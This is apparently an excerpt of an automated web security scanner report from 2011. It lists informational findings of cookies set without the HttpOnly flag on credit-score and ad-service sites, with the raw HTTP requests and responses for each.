Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MachineName=IRC-P2WEB-07; OriginalReferrer=; NavFlowID=; NumTrialDaysLeft=; UID=dfa29d439e60422e86d8462241524cd1; NavigationPath=default; LastVisitDate=4/24/2011 12:44:36 PM; ASP.NET_SessionId=z5w0c1552jmahb45v4wnxt3b; BIGipServerfreecreditscore-web-pool=174804490.19999.0000; mbox=check#true#1303674352|session#1303674291453-51326#1303676152

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=freecreditscore.com/dni; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: NavigationPath=default+s_code.axd+ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: LastVisitDate=4/24/2011 12:44:40 PM; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Sun, 24 Apr 2011 19:44:40 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Sun, 24 Apr 2011 19:44:40 GMT
ETag: "pv39d1695d5d24472e12359de5f0dd92d7"
Expires: Tue, 26 Apr 2011 19:44:40 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C70872.A70594.RA70541.G11457.UDB887A50].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 791

if(typeof ECD == "undefined") ECD={};
if(typeof ECD.Web == "undefined") ECD.Web={};
if(typeof ECD.Web.WebProcesses == "undefined") ECD.Web.WebProcesses={};
if(typeof ECD.Web.WebProcesses.bpRegister
...[SNIP]...

18.473. http://www.freecreditscore.com/dni/javascripts/s_code.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditscore.com
Path:   /dni/javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/javascripts/s_code.axd HTTP/1.1
Host: www.freecreditscore.com
Proxy-Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MachineName=IRC-P2WEB-07; OriginalReferrer=; NavFlowID=; NumTrialDaysLeft=; UID=dfa29d439e60422e86d8462241524cd1; NavigationPath=default; LastVisitDate=4/24/2011 12:44:36 PM; ASP.NET_SessionId=z5w0c1552jmahb45v4wnxt3b; BIGipServerfreecreditscore-web-pool=174804490.19999.0000; mbox=check#true#1303674352|session#1303674291453-51326#1303676152

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=freecreditscore.com/dni; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: NavigationPath=default+s_code.axd; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: LastVisitDate=4/24/2011 12:44:39 PM; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET
Content-Type: text/javascript; charset=utf-8
Date: Sun, 24 Apr 2011 19:44:39 GMT
ETag: "pv13b9cf18ec41e1ccfc351a45220c652a"
Expires: Tue, 26 Apr 2011 19:44:39 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C70872.A70594.RA70541.G11457.UF483C3F].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 65887

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expiglobal,expifcslive"

var s=s_gi(s
...[SNIP]...

18.474. https://www.freecreditscore.com/dni/javascripts/s_code.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.freecreditscore.com
Path:   /dni/javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/javascripts/s_code.axd HTTP/1.1
Host: www.freecreditscore.com
Connection: keep-alive
Referer: https://www.freecreditscore.com/dni/sign-in.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=dfa29d439e60422e86d8462241524cd1; NavFlowID=; NumTrialDaysLeft=; MachineName=IRC-P2WEB-06; OriginalReferrer=freecreditscore.com/dni; NavigationPath=default+sign-in; LastVisitDate=4/24/2011 5:36:50 PM; ASP.NET_SessionId=i5yzufy4tzcjwrnuuk1t5nf0; BIGipServerfreecreditscore-web-pool=174738954.19999.0000; mbox=check#true#1303691762|session#1303691701600-906378#1303693562|PC#1303691701600-906378.17#1304901306; s_pers=%20s_lv%3D1303691711968%7C1398299711968%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303693511968%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691711994'%255D%255D%7C1461544511994%3B%20sc_cidstack%3D%255B%255B'671212'%252C'1303691711997'%255D%255D%7C1461544511997%3B%20sc_dl%3D1%7C1303693619401%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.freecreditscore.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage11%2526SiteVersionID%253D932%2526SiteID%253D100323%2526sc%253D671212%2526bcd%253D%7C1303693619408%3B%20gpv_PN%3D100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%7C1303693619411%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20ttc%3D1303691818740%3B%20sc_gvl_sc%3D671212%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined671212undefined%3B%20SC_LINKS%3D100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%255E%255EMember%2520Sign-in%255E%255E100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%2520%257C%2520Member%2520Sign-in%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpifcslive%253D%252526pid%25253D100323%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage11%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.freecreditscore.com%2525252Fdni%2525252Fsign-in_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+sign-in+s_code.axd; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: LastVisitDate=4/24/2011 5:36:53 PM; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET
Content-Type: text/javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:36:53 GMT
ETag: "pv13b9cf18ec41e1ccfc351a45220c652a"
Expires: Wed, 27 Apr 2011 00:36:53 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C70872.A70594.RA70541.G11457.UF483C3F].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 65887

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expiglobal,expifcslive"

var s=s_gi(s
...[SNIP]...

18.475. https://www.freecreditscore.com/dni/sign-in.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.freecreditscore.com
Path:   /dni/sign-in.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/sign-in.aspx HTTP/1.1
Host: www.freecreditscore.com
Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage11&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=dfa29d439e60422e86d8462241524cd1; OriginalReferrer=; NavFlowID=; NumTrialDaysLeft=; MachineName=IRC-P2WEB-06; NavigationPath=default; LastVisitDate=4/24/2011 5:34:46 PM; ASP.NET_SessionId=i5yzufy4tzcjwrnuuk1t5nf0; BIGipServerfreecreditscore-web-pool=174738954.19999.0000; mbox=check#true#1303691762|session#1303691701600-906378#1303693562|PC#1303691701600-906378.17#1304901306; s_pers=%20s_lv%3D1303691711968%7C1398299711968%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303693511968%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691711994'%255D%255D%7C1461544511994%3B%20sc_cidstack%3D%255B%255B'671212'%252C'1303691711997'%255D%255D%7C1461544511997%3B%20sc_dl%3D1%7C1303693619401%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.freecreditscore.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage11%2526SiteVersionID%253D932%2526SiteID%253D100323%2526sc%253D671212%2526bcd%253D%7C1303693619408%3B%20gpv_PN%3D100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%7C1303693619411%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20ttc%3D1303691818740%3B%20sc_gvl_sc%3D671212%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined671212undefined%3B%20SC_LINKS%3D100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%255E%255EMember%2520Sign-in%255E%255E100323%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage11%2520%257C%2520Member%2520Sign-in%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpifcslive%253D%252526pid%25253D100323%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage11%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.freecreditscore.com%2525252Fdni%2525252Fsign-in_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=freecreditscore.com/dni; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: NavigationPath=default+sign-in; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: LastVisitDate=4/24/2011 6:25:26 PM; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:25:26 GMT
ETag: "pvdcb29fc310c6ce2e8ac88af3a0c302e2"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C70872.A70594.RA0.G11457.U24A69375].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 10095

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>
           My Credit Score - Member Login | Free Credit Score
       </title>
   
...[SNIP]...

18.476. http://www.googleadservices.com/pagead/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&client=ca-pub-6888065668292638&val=ChAyMmZiYTMwMDE2MDEwMDhkEJSfre0EGghI3SWftmaJ_yABKAE&sig=AGiWqtzICqiMDTo80UkKP6AzOKgkaHuSwA&adurl=http://clk.atdmt.com/go/253732016/direct%3Bai.194941096%3Bct.1/01 HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CtACQktrYnA1QmEwVGQzd0ZvejJsQWVieXJDd0NkZnEtTk1CbjZDVTdCaWZ4TzNVSEFBUUFSZ0JJQUE0QVZDQXgtSEVCR0RKN29PSThLUHNFb0lCRjJOaExYQjFZaTAyT0RnNE1EWTFOalk0TWpreU5qTTRvQUhEOHYzc0E3SUJGM0IxWWk1eVpYUmhhV3hsY2kxaGJXRjZiMjR1Ym1WMHVnRUtNVFl3ZURZd01GOWhjOGdCQ2RvQlNXaDBkSEE2THk5d2RXSXVjbVYwWVdsc1pYSXRZVzFoZW05dUxtNWxkQzlpWVc1dVpYSmZNVEl3WHpZd01GOWhMbkJvY0Q5elpXRnlZMmc5SlRkQ0pHdGxlWGR2Y21RbE4wU1lBdVFad0FJRXlBS0YwczhLcUFNQjZBTzhBZWdEbEFMMUF3QUFBTVNBQnVpM3pxckJqcktHMFFFEhMIvbvOyZS1qAIViN7gCh0CTvIJGAEg2Ojpw8TTuK2fAUgB; expires=Tue, 24-May-2011 12:32:36 GMT; path=/pagead/conversion/1033861443/
Cache-Control: private
Location: http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 12:32:36 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


18.477. http://www.googleadservices.com/pagead/conversion/1023174153/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1023174153/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/conversion/1023174153/?random=1303691592018&cv=6&fst=1303691592018&num=1&fmt=3&value=0&label=posFCJPGhgIQiczx5wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=1&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&url=http%3A//www.positivesearchresults.com/%3Fgclid%3DCM3Ir8m1tqgCFcPd4AodKWFhDw HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.positivesearchresults.com/?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Conversion=CoQBQzlyRUxLc0cwVGFmZEU4ZmN0d2Y0aC1WUnU2Q3I4QUh6djh2R0hNR2ctX0lEQ0FBUUF5Z0RVTHpCcGJMNl9fX19fd0ZneWU2RGlQQ2o3QktnQVluTThlY0R5QUVCcWdRYVQ5QlR0RDh3Mncyc1ppQkIxMzU0Nlk0QU5DMzhXUTcyZVFNEhMIzcivybW2qAIVw93gCh0pYWEPGAEg0rv_xcOctcn6AUgB

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Mon, 25 Apr 2011 00:33:01 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: Conversion=CoQBQzlyRUxLc0cwVGFmZEU4ZmN0d2Y0aC1WUnU2Q3I4QUh6djh2R0hNR2ctX0lEQ0FBUUF5Z0RVTHpCcGJMNl9fX19fd0ZneWU2RGlQQ2o3QktnQVluTThlY0R5QUVCcWdRYVQ5QlR0RDh3Mncyc1ppQkIxMzU0Nlk0QU5DMzhXUTcyZVFNEhMIzcivybW2qAIVw93gCh0pYWEPGAAg6ujf2Lu78LONAUgB; expires=Wed, 25-May-2011 00:32:54 GMT; path=/pagead/conversion/1023174153/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1023174153/?random=1303691592018&cv=6&fst=1303691592018&num=1&fmt=3&value=0&label=posFCJPGhgIQiczx5wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=1&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&url=http%3A//www.positivesearchresults.com/%3Fgclid%3DCM3Ir8m1tqgCFcPd4AodKWFhDw&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

18.478. http://www.googleadservices.com/pagead/conversion/1072108379/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1072108379/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/conversion/1072108379/?random=1303691705172&cv=6&fst=1303691705172&num=1&fmt=3&value=0&label=J2jSCPzy3gEQ26ac_wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=1&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&url=http%3A//www.freecreditreport.com/default.aspx%3Fsc%3D670839%26bcd%3DdaB7KMjz%26mkwid%3DsdaB7KMjz%26pcrid%3D6283273924%26kwid%3Dcredit%2520monitoring HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.freecreditreport.com/default.aspx?sc=670839&bcd=daB7KMjz&mkwid=sdaB7KMjz&pcrid=6283273924&kwid=credit%20monitoring
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Conversion=CnlDWUNxbGZzRzBUYkc2R2NQV3R3ZW9xSmsyck5PZTJnSGs3TDdoRjVmb21Dd1FBeWdJVU1LdGpaSUNZTW51ZzRqd28td1NvQUhicHB6X0E4Z0JBYW9FR2tfUUxEeDlRNlZjOTI1QUhLd0J5Z0dXNUdWdVNjR05YX0p5EhMIroO6-LW2qAIV4n3lCh2iLvwOGAEgsOSF547copLWAUgB

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Mon, 25 Apr 2011 01:03:11 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: Conversion=CnlDWUNxbGZzRzBUYkc2R2NQV3R3ZW9xSmsyck5PZTJnSGs3TDdoRjVmb21Dd1FBeWdJVU1LdGpaSUNZTW51ZzRqd28td1NvQUhicHB6X0E4Z0JBYW9FR2tfUUxEeDlRNlZjOTI1QUhLd0J5Z0dXNUdWdVNjR05YX0p5EhMIroO6-LW2qAIV4n3lCh2iLvwOGAAglde6nNeD7ZVPSAE; expires=Wed, 25-May-2011 00:34:32 GMT; path=/pagead/conversion/1072108379/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072108379/?random=1303691705172&cv=6&fst=1303691705172&num=1&fmt=3&value=0&label=J2jSCPzy3gEQ26ac_wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=1&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&url=http%3A//www.freecreditreport.com/default.aspx%3Fsc%3D670839%26bcd%3DdaB7KMjz%26mkwid%3DsdaB7KMjz%26pcrid%3D6283273924%26kwid%3Dcredit%2520monitoring&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

18.479. http://www.hellonetwork.com/ypsearch.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hellonetwork.com
Path:   /ypsearch.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ypsearch.cfm?kw=credit%20monitoring&KID=29264 HTTP/1.1
Host: www.hellonetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: IPCITYNAME=Dallas;expires=Tue, 16-Apr-2041 19:56:39 GMT;path=/
Set-Cookie: IPCITYSTATE=TX;expires=Tue, 16-Apr-2041 19:56:39 GMT;path=/
Set-Cookie: IPCITYZIP=75207;expires=Tue, 16-Apr-2041 19:56:39 GMT;path=/
